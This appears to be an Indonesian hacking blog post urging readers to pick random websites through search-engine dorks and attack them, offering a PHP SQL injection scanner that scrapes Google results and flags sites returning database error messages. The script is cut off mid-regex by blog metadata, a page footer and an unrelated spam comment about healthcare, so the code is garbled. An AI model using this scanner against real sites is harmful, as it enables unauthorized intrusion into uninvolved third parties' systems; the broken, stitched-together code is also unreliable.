Random Web Hacking
Menurut saya ini yang paling mudah, melakukan penetrasi suatu website yang bersifat random. Artinya kita gak menentukan siapa target kita, tetapi dengan perantara Search Engine (Biasanya loh) kita mencari satu per satu website yang “kita anggap” memiliki celah keamanan yang bisa kita exploitasi.
Disini saya ada script php sederhana buatan XshimeX (gak enak masa scriptnya jadi balik nama ). Buat aja sqliscanner.php dan paste kode berikut…
Code:
/**
* SQL Injection Scanner
* PHP Version By XShimeX
* Version 1.0
* Thanks To: TBDSecurity.Com, HMSecurity.org, All my friends, And ALLAH.
*/
set_time_limit(0);
$vuln = 0;
$not_vuln = 0;
$total = 0;
print "[+] SQL Injection Scanner PHP Version\n";
print "[+] Version 1.0 By XShimeX\n";
if(!$argv[1]) {
print "[%] Usage: $argv[0]
print "[%] Example : $argv[0] inurl:news.php?id=\n";
exit;
}
/**
* SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
*/
$bug = array(
'You have an error in your SQL','Division by zero in',
'supplied argument is not a valid MySQL result resource in',
'Call to a member function','Microsoft JET Database',
'ODBC Microsoft Access Driver',
'Microsoft OLE DB Provider for SQL Server',
'Unclosed quotation mark',
'Microsoft OLE DB Provider for Oracle',
'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
'Incorrect syntax near'
);
print "[@] Start Finding Links...\n";
for($i = 0; $i <= 900; $i += 100) {
$fp = @file_get_contents("http://www.google.com/search?q=%24argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N");
@preg_match_all("/
22 Feb 2011
teknik hacking web sesuai yang ane janjikan sedikit ilmu yang ane pelajari ingat hanya buat belajar!!
10.57
1 comment
/", $fp, $links);
Langganan:
Posting Komentar (Atom)
It is additionally the obligation of medical care experts to give protected and successful mediations to help physical and psychological wellness without disagreeable incidental effects. Wellbeing administrations additionally need to think about imbalances of wellbeing and search out those people who can't get to medical care administrations wellnesspitch or who don't ordinarily profit from customary wellbeing administrations.
BalasHapus